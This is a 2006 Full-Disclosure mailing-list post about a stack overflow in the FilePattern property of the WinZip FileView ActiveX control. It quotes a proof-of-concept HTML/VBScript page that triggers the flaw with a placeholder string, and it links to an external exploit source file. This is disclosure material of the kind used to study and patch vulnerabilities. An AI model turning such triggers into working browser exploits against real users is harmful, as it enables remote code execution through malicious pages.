[Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
Micheal Turner
wh1t3h4t3 at yahoo.co.uk
Wed Nov 15 14:17:12 GMT 2006
here we go, enjoy!
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-MS-winzip.c
--- Micheal Turner <wh1t3h4t3 at yahoo.co.uk> wrote:
> 7245 correctly resolves this issue; standard stack
> overflow in WZFILEVIEW.FilePattern snatching EIP;
> PoC below;
>
> <HTML>
> <HEAD>
> <TITLE></TITLE>
> </HEAD>
> <BODY>
> <SCRIPT LANGUAGE="VBScript">
> <!--
> Sub WZFILEVIEW_OnAfterItemAdd(Item)
> WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
> end sub
> -->
> </SCRIPT>
> <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
> CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
> </OBJECT>
> </BODY>
> </HTML>
>
>
> -- prdelka
Full-Disclosure is hosted and sponsored by Secunia.